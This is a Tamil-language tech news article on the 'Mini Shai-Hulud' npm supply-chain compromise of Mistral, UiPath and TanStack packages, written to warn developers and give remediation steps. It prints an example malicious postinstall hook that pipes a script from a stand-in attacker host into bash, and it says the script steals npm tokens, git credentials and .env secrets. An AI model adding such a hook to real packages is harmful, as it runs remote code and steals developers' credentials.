‹ முகப்புக்கு திரும்ப

npm‑ல் Mini Shai‑Hulud அட்டக்‌டு: Mistral, UiPath, TanStack‑ன் பாக்கேஜ்‌கள் ஹேக் ஆனது

Mini Shai‑Hulud supply‑chain அட்டக்‌டு npm‑ல் 30‑க்கும் மேல் பாக்கேஜ்களைத் தொட்டு, Mistral, UiPath, TanStack‑ன் பிரபலமான லைப்ரரிகள் பாதிக்கப்பட்டது. இந்திய டெவலப்பர்களுக்கு உடனடி நடவடிக்கை அவசியம்.

Keerthika 6 min read
Google-ல் Follow
அப்டேட் 1 மாதம் முன்
Security npm‑ல் Mini Shai‑Hulud அட்டக்‌டு: Mistral, UiPath, TanStack‑ன் பாக்கேஜ்‌கள் ஹேக் ஆனது 6 நிமிடம் மீதம் Google-ல் Follow
npm‑ல் Mini Shai‑Hulud அட்டக்‌டு: Mistral, UiPath, TanStack‑ன் பாக்கேஜ்‌கள் ஹேக் ஆனது

தமிழ்டெக் AI சுருக்கம்

Mini Shai-Hulud என்ற புதிய supply-chain attack கடந்த வாரம் npm-ல் 30-க்கும் மேற்பட்ட packages-ஐ பாதித்தது; அதில் mistral-ai client, பல UiPath SDK/CLI tools, மற்றும் TanStack-ன் react-router, @tanstack/query போன்ற முக்கிய libraries அடங்கும். Malicious versions postinstall hook வழியாக remote server-லிருந்து script இழுத்து PATH-ல் சேர்த்து, npm tokens, git credentials, .env போன்ற secrets-ஐ திருடும் வகையில் அமைக்கப்பட்டிருந்தன. இந்த packages இந்திய startups-ல் AI chatbots, RPA, SPA projects-க்கு அதிகம் பயன்படுவதால் CI pipeline வழியாக cloud API keys திருடப்படலாம் அல்லது மேலும் malware பரவலாம் என்பதால் இது முக்கியம். நீங்கள் உடனே lockfile-ஐ npm audit மூலம் சரிபார்த்து, பாதிக்கப்பட்ட versions இருந்தால் node_modules மற்றும் lockfile நீக்கி clean install செய்து, எல்லா API keys/CI tokens-ஐயும் rotate செய்யுங்கள். நீண்டகாலமாக SBOM scan, verified packages, npm ci, மற்றும் private registry போன்ற controls-ஐ workflow-ல் சேர்த்து supply-chain risk-ஐ குறைத்துக் கொள்ளுங்கள்.

  • Mini Shai‑Hulud npm‑ல் 30‑க்கும் மேல் பாக்கேஜ்களில் malicious postinstall ஸ்கிரிப்ட் இடியது.
  • Mistral AI client, UiPath SDK, React‑Router, TanStack Query போன்ற பிரபல லைப்ரரிகள் பாதிக்கப்பட்டன.
  • இன்டியா டெவலப்பர்கள் lockfile audit, சீக்ரெட் rotation, SBOM அமைப்பு போன்ற உடனடி நடவடிக்கைகளை செய்ய வேண்டும்.

AI உதவியுடன் தயாரான சுருக்கம் — தமிழ்டெக் எடிட்டர்ஸ் சரிபார்த்தது.

0:00
0:00
🔒 Listen வசதி subscribers-க்கு மட்டும். Subscribe செய்யுங்கள்

சுருக்கம் – என்ன நடந்தது?

கடைசிப் வாரம் Mini Shai‑Hulud என்ற புதிய சப்ளை‑செயின் அட்டக்‌டு npm‑ல் 30‑க்கும் மேற்பட்ட பாக்கேஜ்களில் தீங்கிழைக்கும் கோடுகளை இடுகிறது. பாதிக்கப்பட்டவை mistral‑ai கிளையண்ட், பல uipath‑sdk உதவிகள், மற்றும் TanStack‑ன் முக்கிய லைப்ரரிகள் react‑router, @tanstack/query போன்றவை.

அட்டக்‌டு எப்படி வேலை செய்கிறது?

மாலிஷியஸ் வெர்ஷன் postinstall ஹுக்கை பயன்படுத்துகிறது. நீங்கள் npm install பண்ணும் போது, அந்த ஹுக் ஒரு ரிமோட் சர்வரிலிருந்து ஸ்கிரிப்டை curl கொண்டு டவுன்லோடு செய்து, node_modules/.bin இல் வைப்பு, பின்னர் PATH‑ல் சேர்க்கிறது. இதனால் உங்கள் எல்லா CLI‑களும் ஹேக்கர் ஆற்றலுக்கு உட்படுகின்றன.

npm install [email protected]
# package.json‑ல் malicious postinstall
"scripts": { "postinstall": "curl -s https://badguy.com/x | bash" }

இந்த ஸ்கிரிப்ட் பொதுவாக npm_token, git_credentials, .env போன்ற ரகசியங்களை திருடுகிறது.

எது பாதிக்கப்பட்டது?

  • mistral-ai – Mistral LLM API‑க்கு அதிகாரப்பூர்வ கிளையண்ட்.
  • uipath‑sdk, uipath‑cli – RPA டெவலப்பர்கள் பயன்படுத்தும் உதவிகள்.
  • react‑router (v6.15.0) – React‑ன் ரௌட்டிங் லைப்ரரி.
  • @tanstack/query (v5.0.2) – React, Vue, Svelte‑ல் data‑fetching செய்யப் பயன்படுத்தப்படும்.
  • TanStack monorepo‑யின் சில சிறிய யூட்டிலிட்டிகள்.

இந்த வெர்ஷன்கள் 22 மே முதல் 28 மே 2024 வரை வெளியிடப்பட்டன. npm‑ன் பாதுகாப்பு குழு உடனே அவை நீக்கப்பட்டாலும், அந்த காலப்பகுதியில் npm install செய்த அனைவருக்கும் அபாயம் உள்ளது.

இந்த விஷயம் இந்திய டெவலப்பர்களுக்கு ஏன் முக்கியம்?

நம்மைச் சுற்றி பல ஸ்டார்ட்அப்‌கள் Mistral‑ஐ AI chatbot‑களுக்கு, UiPath‑ஐ RPA‑க்கு, TanStack‑ஐ SPA‑களுக்குப் பயன்படுத்துகின்றன. ஒரு ஹேக்கர் உங்கள் CI pipeline‑ல் இந்த மால்வேர் செருகியிருந்தால், அது:

  1. Google Cloud, AWS, Azure போன்ற கிளௌட் API‑க்களின் சிப்புகளைத் திருடும்.
  2. Docker image‑‑ல் ரான்சம்‌வேர் ஊட்டும்.
  3. பின்னர் கூடுதல் மால்வேரை டவுன்லோடு செய்யும் பாக்‑டோர்களை உருவாக்கும்.

இந்தப் பிழைத் தகவல், பயனர் தரவுகள், நிதி பரிவர்த்தனை மற்றும் IT சட்டத்தின் கீழ் அபராதம் ஆகியவற்றை ஏற்படுத்தலாம்.

உடனடி நடவடிக்கைகள் – என்ன செய்ய வேண்டும்?

  1. Lockfile‑ஐ audit செய்யுங்கள். npm audit இயக்கி, [email protected], [email protected] போன்ற வெர்ஷன்களைப் பாருங்கள்.
  2. மீண்டும் clean install செய்யுங்கள். rm -rf node_modules package-lock.json செய்து, npm install மீண்டும் இயக்கவும்.
  3. சீக்ரெட்டுகளை rotate செய்யுங்கள். அனைத்து API key‑களையும், CI‑இல் பயன்படுத்திய token‑களையும் மீண்டும் உருவாக்கவும்.
  4. npm‑ன் integrity check‑ஐ பயன்படுத்துங்கள். CI‑இல் npm ci --prefer-offline வைத்து, குற்றமற்ற பதிப்புகளே நிறுவப்படும்.
  5. Private registry அல்லது proxy பயன்படுத்துங்கள். Verdaccio, GitHub Packages போன்றவை உங்கள் நிறுவனத்திற்கு அனுமதியற்ற பாக்கேஜ்களைத் தடுக்க உதவும்.

நீண்டகால பாதுகாப்பு வழிமுறைகள்

TamilTech‑ஓட கருத்து: supply‑chain அட்டக்‌டுகள் இனி அரிதாக இருக்காது. உங்கள் workflow‑ல் இவை சேர்க்க வேண்டும்:

  • SBOM (Software Bill of Materials) – Syft, Dependency‑Track போன்ற கருவிகள் மூலம் ஒவ்வொரு dependency‑யும் பட்டியலிட்டு ஸ்கேன் செய்யுங்கள்.
  • Package code‑signing – நம்பகமான கீயுடன் சைன் செய்யப்பட்ட npm பாக்கேஜ்கள் மட்டுமே ஏற்கவும்.
  • Zero‑trust CI – Build container‑களை isolate செய்து, production secret‑களை build environment‑இல் வெளிப்படுத்த வேண்டாம்.
  • Community monitoring – npm security alerts, #npm-security Slack channel‑இல் சேர்ந்து, புதிய advisory‑களை உடனே பார்க்கவும்.

அடுத்ததாக என்ன எதிர்பார்க்கலாம்?

npm security team ஏற்கனவே இந்த malicious வெர்ஷன்களை flag செய்து, maintainers‑னுடன் extra verification சேர்க்க வேலை செய்கிறது. சில நாட்களில் affected libraries‑க்கு “verified publisher” badge வரும். அதற்குள், GitHub‑இல் வரும் security‑advisory PR‑களை கவனித்து, version bump‑களை ஏற்றுக்கொள்ளுங்கள்.

இந்த சம்பவம் சொல்லும் விஷயம் – npm install என்பது ஒரு “சாதாரண” படி அல்ல. ஒவ்வொரு பாக்கேஜையும் ஒரு சாத்தியமான நுழைவு புள்ளி போலக் கருதி, AI API‑கள், RPA SDK‑கள் போன்ற உயர்‑அனுமதி கொண்ட டோக்கன்களைப் பயன்படுத்தும் போது அதிக கவனம் செலுத்த வேண்டும்.

இப்போதே lockfile‑ஐ audit செய்து, சீக்ரெட்டுகளை rotate செய்து, SBOM‑ஐ அமைக்கவும். சிறிது முயற்சி இப்போது, பின்னர் வரும் பெரிய ஓட்டத்தைத் தடுக்கும்.

நாளைய டெக் செய்திகள் உங்க WhatsApp-க்கே

தினமும் ஒரு சின்ன update, இலவசம். TamilTech channel-ஐ follow பண்ணுங்க.

What do you think?

people reacted

Keerthika

தமிழ்டெக் எடிட்டோரியல் டீம் · 3,346 கட்டுரைகள்

Keerthika is an editor at TamilTech, the Tamil and English technology publication founded by Praveen Kumar S. She covers AI, smartphones, gadgets, EVs, startups and cybersecurity i...

மேலும் Keerthika

WhatsApp-ல் TamilTech-ஐக் கேளுங்க

டெக் சந்தேகமா? தமிழிலோ ஆங்கிலத்திலோ கேளுங்க — எங்க WhatsApp அசிஸ்டன்ட் TamilTech கட்டுரைகளில் இருந்து சில நொடிகளில் பதில் சொல்லும்.

தொடர்புடைய செய்திகள்

கருத்துகள் (0)

| Supports **bold**, *italic*, `code`

Be the first to comment!

அடுத்த செய்தி PixelLeak: AI Coding Agents 13,000 கம்பெனி Screenshots-ஐ GitHub-ல Public ஆக்கிடுச்சு
Tamiltech

Tamiltech

Install app for faster access

Earn XP 🏆
WhatsApp
Notifications